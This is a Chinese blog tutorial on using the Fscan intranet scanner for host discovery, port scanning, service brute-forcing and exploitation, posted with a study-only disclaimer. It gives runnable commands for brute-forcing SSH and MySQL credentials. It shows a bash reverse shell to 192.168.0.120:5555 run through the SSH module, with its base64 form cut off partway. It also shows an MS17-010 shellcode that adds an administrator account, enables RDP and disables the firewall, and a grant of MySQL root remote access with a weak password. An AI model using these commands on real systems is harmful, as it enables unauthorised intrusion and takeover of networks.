内网扫描器Fscan的使用

2024-01-18 12:20
文章标签 使用 fscan 扫描器

本文主要是介绍内网扫描器Fscan的使用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

简介

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

主要功能

1.信息搜集:
存活探测(icmp)
端口扫描
2.爆破功能:
各类服务爆破(ssh、smb、rdp等)
数据库密码爆破(mysql、mssql、redis、psql、oracle等)
3.系统信息、漏洞扫描:
netbios探测、域控识别
获取目标网卡信息
高危漏洞扫描(ms17010等)
4.Web探测功能:
webtitle探测
web指纹识别(常见cms、oa框架等)
web漏洞扫描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
redis写公钥或写计划任务
ssh命令执行
ms17017利用(植入shellcode),如添加用户等
6.其他功能:
文件保存

使用方法

完整参数

-c string #ssh命令执行
-cookie string #设置cookie
-debug int #多久没响应,就打印当前进度(default 60)
-domain string #smb爆破模块时,设置域名
-h string #目标ip: 192.168.11.11 | 192.168.11.11-255 |192.168.11.11,192.168.11.12
-hf string #读取文件中的目标
-hn string #扫描时,要跳过的ip: -hn 192.168.1.1/24
-m string #设置扫描模式: -m ssh (default “all”)
-no #扫描结果不保存到文件中
-nobr #跳过sql、ftp、ssh等的密码爆破
-nopoc #跳过web poc扫描
-np #跳过存活探测
-num int #web poc 发包速率 (default 20)
-o string #扫描结果保存到哪 (default “result.txt”)
-p string #设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default “21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017”)
-pa string #新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
-path string #fcgi、smb romote file path
-ping #使用ping代替icmp进行存活探测
-pn string #扫描时要跳过的端口,as: -pn 445
-pocname string #指定web poc的模糊名字, -pocname weblogic
-proxy string #设置代理, -proxy http://127.0.0.1:8080
-user string #指定爆破时的用户名
-userf string #指定爆破时的用户名文件
-pwd string #指定爆破时的密码
-pwdf string # 指定爆破时的密码文件
-rf string #指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
-rs string #redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent #静默扫描,适合cs扫描时不回显
-sshkey string #ssh连接时,指定ssh私钥
-t int #扫描线程 (default 600)
-time int #端口扫描超时时间 (default 3)
-u string #指定Url扫描
-uf string #指定Url文件扫描
-wt int #web访问超时时间 (default 5)
-pocpath string #指定poc路径
-usera string #在原有用户字典基础上,新增新用户
-pwda string #在原有密码字典基础上,增加新密码
-socks5 #指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)
-sc #指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)

简单使用

fscan.exe -h [IP] #默认使用全部模块
fscan.exe -h 192.168.1.1/16 #扫描B段
fscan.exe -h 192.168.x.x -h 192.168.1.1/24 //C段
fscan.exe -h 192.168.x.x -h 192.168.1.1/16 //B段
fscan.exe -h 192.168.x.x -h 192.168.1.1/8  //A段的192.x.x.1和192.x.x.254,方便快

在这里插入图片描述
加上netbios模块才会显示netbios的信息

 .\fscan64.exe -h 192.168.88.141 -m netbios

在这里插入图片描述
扫描后生成结果文件
扫描过后会生成一个result.txt的文件,扫描的详细情况都会保存在这个文件中。
在这里插入图片描述
若要更换扫描生成的文件的位置和文件名:

.\fscan.exe -h [目标IP] -o .\tmp\1.txt 	#默认保存在当前目录下

若想不把扫描结果保存到文件中只需要加上-no参数:

.\fscan.exe -h [目标IP] -no #-no参数要添加在IP的后面才能生效
3.2.1 以文件进行导入扫描

.\fscan64.exe -hf D:\LCstudy\内网渗透工具\fscan\ip.txt
.\fscan64.exe -hf .\ip.txt

#可以使用相对位置,也可以使用绝对位置
在这里插入图片描述
3.2.2 跳过相应IP进行扫描

.\fscan64.exe -h 192.168.88.1/24

未跳过IP扫描前

在这里插入图片描述
跳过扫描后
在这里插入图片描述3.2.3 对url进行扫描

.\fscan64.exe -u http://baidu.com

-uf 对指定文件内的URL进行扫描
在这里插入图片描述设置socke5代理

在这里插入图片描述
爆破功能

爆破使用
爆破功能简单使用的话直接使用即可默认调用,输入如下命令它会自动爆破扫描出来的服务

 .\fscan64.exe -h 192.168.88.130

对模块进行自定义文件爆破

.\fscan64.exe -h [IP] -m [模块] -p [模块对应的端口] -pwdf [密码文件] -userf [用户名文件]

-m的模块包含:

[mssql] [ms17010] [all] [portscan] [ftp] [smb] [netbios] [oracle] [redis][fcgi] [mem] [web] [ssh] [findnet] [icmp] [main] [rdp] [mgo] [cve20200796][webonly] [mysql] [psql]

对ssh模块进行爆破,并设置自定义文件爆破:

.\fscan64.exe -h 192.168.88.130 -m ssh -p 22 -pwdf .\pwd.txt -userf .\users.txt

-pwdf 、-userf 同样也是相对位置和绝对位置都可以使用。

注:在进行爆破的时候是按文件里面的顺序进行爆破的,这时ssh包含多个用户,只能爆破出来第一个,要把root类的管理权限高的用户名放在文本得最上面。

附加一个扫mysql服务的:

 .\fscan64.exe -h 192.168.88.143 -m mysql -np -nopoc

在这里插入图片描述
这里-np、-nopoc下面会介绍到。
使用navicat连接成功。
在这里插入图片描述连接的前提:你目标机要开启远程连接,

mysql开启远程连接:

grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;		#开启一个远程连接用户为root任意IP可以连接,密码时123456
flush privileges;	#刷新用户权限
select user,host from user;		#查看用户检查是否已经更改
4.3 跳过一些扫描进行爆破
-nobr 		#跳过sql、ftp、ssh等爆破
-nopoc 		#跳过web poc扫描
-np 		#跳过存活检测

执行命令

.\fscan64.exe -h 192.168.88.143 -m mysql -np -nopoc
这里就是跳过存活检测,和跳过web,poc检测的扫描对mysql进行爆破

在这里插入图片描述
跳过爆破:

.\fscan64.exe -h 192.168.88.143 -m mysql -nobr

在这里插入图片描述
这里就没有mysql的服务的爆破的用户和密码

爆破还可以结合代理 -proxy string参数

漏洞利用功能

使用ssh命令执行

.\fscan64.exe -h [目标IP] -c [执行的命令]

例如:

查看用户:

 .\fscan64.exe -h 192.168.88.130 -c whoami

在这里插入图片描述
ssh命令执行上线Necat
执行的命令:

bash -i >& /dev/tcp/192.168.0.120/5555 0>&1
编码后执行的命令(因为在powershell中执行的命令不能包含&&&):.\fscan64.exe -h 192.168.88.130  -c "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI

在这里插入图片描述注:若命令有变只需要将变化后执行的命令进行base64编码后,对上述编码后执行的命令中的base64编码进行替换即可。
MS17-010模块利用
添加用户:

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc add
执行此命令后会生成一个用户,用户名:sysadmin 密码:1qaz@WSX!@#4源码add的含义(若想看此文件详细源码https://github.com/shadow1ng/fscan/blob/main/Plugins/ms17010-exp.go)://msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user sysadmin "1qaz@WSX!@#4" /ADD && net localgroup Administrators sysadmin /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off'

在这里插入图片描述

启用guest用户,并把guest用户添加到管理员组

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc guest
#启用后用户是guest 密码:1qaz@WSX!@#4

下载地址
https://github.com/shadow1ng/fscan

这篇关于内网扫描器Fscan的使用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/618985

相关文章

Python通用唯一标识符模块uuid使用案例详解

《Python通用唯一标识符模块uuid使用案例详解》Pythonuuid模块用于生成128位全局唯一标识符,支持UUID1-5版本,适用于分布式系统、数据库主键等场景,需注意隐私、碰撞概率及存储优... 目录简介核心功能1. UUID版本2. UUID属性3. 命名空间使用场景1. 生成唯一标识符2. 数

SpringBoot中如何使用Assert进行断言校验

《SpringBoot中如何使用Assert进行断言校验》Java提供了内置的assert机制,而Spring框架也提供了更强大的Assert工具类来帮助开发者进行参数校验和状态检查,下... 目录前言一、Java 原生assert简介1.1 使用方式1.2 示例代码1.3 优缺点分析二、Spring Fr

Android kotlin中 Channel 和 Flow 的区别和选择使用场景分析

《Androidkotlin中Channel和Flow的区别和选择使用场景分析》Kotlin协程中,Flow是冷数据流,按需触发,适合响应式数据处理;Channel是热数据流,持续发送,支持... 目录一、基本概念界定FlowChannel二、核心特性对比数据生产触发条件生产与消费的关系背压处理机制生命周期

java使用protobuf-maven-plugin的插件编译proto文件详解

《java使用protobuf-maven-plugin的插件编译proto文件详解》:本文主要介绍java使用protobuf-maven-plugin的插件编译proto文件,具有很好的参考价... 目录protobuf文件作为数据传输和存储的协议主要介绍在Java使用maven编译proto文件的插件

SpringBoot线程池配置使用示例详解

《SpringBoot线程池配置使用示例详解》SpringBoot集成@Async注解,支持线程池参数配置(核心数、队列容量、拒绝策略等)及生命周期管理,结合监控与任务装饰器,提升异步处理效率与系统... 目录一、核心特性二、添加依赖三、参数详解四、配置线程池五、应用实践代码说明拒绝策略(Rejected

C++ Log4cpp跨平台日志库的使用小结

《C++Log4cpp跨平台日志库的使用小结》Log4cpp是c++类库,本文详细介绍了C++日志库log4cpp的使用方法,及设置日志输出格式和优先级,具有一定的参考价值,感兴趣的可以了解一下... 目录一、介绍1. log4cpp的日志方式2.设置日志输出的格式3. 设置日志的输出优先级二、Window

Ubuntu如何分配​​未使用的空间

《Ubuntu如何分配​​未使用的空间》Ubuntu磁盘空间不足,实际未分配空间8.2G因LVM卷组名称格式差异(双破折号误写)导致无法扩展,确认正确卷组名后,使用lvextend和resize2fs... 目录1:原因2:操作3:报错5:解决问题:确认卷组名称​6:再次操作7:验证扩展是否成功8:问题已解

Qt使用QSqlDatabase连接MySQL实现增删改查功能

《Qt使用QSqlDatabase连接MySQL实现增删改查功能》这篇文章主要为大家详细介绍了Qt如何使用QSqlDatabase连接MySQL实现增删改查功能,文中的示例代码讲解详细,感兴趣的小伙伴... 目录一、创建数据表二、连接mysql数据库三、封装成一个完整的轻量级 ORM 风格类3.1 表结构

使用Docker构建Python Flask程序的详细教程

《使用Docker构建PythonFlask程序的详细教程》在当今的软件开发领域,容器化技术正变得越来越流行,而Docker无疑是其中的佼佼者,本文我们就来聊聊如何使用Docker构建一个简单的Py... 目录引言一、准备工作二、创建 Flask 应用程序三、创建 dockerfile四、构建 Docker

Python使用vllm处理多模态数据的预处理技巧

《Python使用vllm处理多模态数据的预处理技巧》本文深入探讨了在Python环境下使用vLLM处理多模态数据的预处理技巧,我们将从基础概念出发,详细讲解文本、图像、音频等多模态数据的预处理方法,... 目录1. 背景介绍1.1 目的和范围1.2 预期读者1.3 文档结构概述1.4 术语表1.4.1 核